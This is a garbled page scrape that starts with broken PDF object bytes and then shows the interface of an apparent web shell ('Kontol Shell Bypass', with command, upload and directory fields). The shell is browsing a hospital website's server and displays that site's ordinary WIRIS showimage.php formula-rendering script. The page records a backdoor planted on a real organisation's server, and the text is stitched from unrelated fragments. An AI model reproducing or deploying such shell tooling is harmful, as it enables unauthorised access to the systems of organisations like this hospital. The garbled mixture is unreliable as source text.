%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /proc/self/root/var/www/html/shardahospital.org/incident/assets/integration/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : //proc/self/root/var/www/html/shardahospital.org/incident/assets/integration/showimage.php
<?php
// ${license.statement}
require_once ('pluginbuilder.php');

$provider = $pluginBuilder->getCustomParamsProvider();

$digest = $provider->getParameter('formula', null);
$mml = $provider->getParameter('mml', null);
$render = $pluginBuilder->newRender();
$jsonformat = $provider->getParameter('jsonformat', null);
$lang = $provider->getParameter('lang', 'en');

// Backwards compatibility.
// showimage.php?formula.png --> showimage.php?formula.
// because formula is md5 string, remove all extensions.
if (!is_null($digest)) {
    $a = explode(".", $digest);
    $digest = array_shift($a);
}

// Adding - if necessary - CORS headers
$origin = isset($_SERVER['HTTP_ORIGIN']) ? $_SERVER['HTTP_ORIGIN'] : "";
$res = new com_wiris_system_service_HttpResponse();
$pluginBuilder->addCorsHeaders($res, $origin);

if ($pluginBuilder->getConfiguration()->getProperty("wirispluginperformance", "false") == "true") {

    // Cache headers
    header("Content-type: application/json");
    header("Pragma:"); // HTTP 1.0
    header("Cache-Control: public, max-age=3600"); // HTTP 1.1
    // If digest == null formula is not in cache.
    if (is_null($digest)) {
        $render->showImage(null, $mml, $provider);
        $digest = $render->computeDigest($mml, $provider->getRenderParameters($pluginBuilder->getConfiguration()));
    }
    $r = $render->showImageJson($digest, $lang);
    // If a formula is not in server cache, this request shouldn't be cached.
    if (strpos($r, "warning" )) {
        header("Pragma: no-cache"); // HTTP 1.0
        header("Cache-Control: no-cache, no-store, must-revalidate"); //HTTP 1.1
    }
} else {
    $contentType = $pluginBuilder->getImageFormatController()->getContentType();
    header('Content-Type: ' . $contentType);
    $r = $render->showImage($digest, $mml, $provider);
}
echo $r;

Kontol Shell Bypass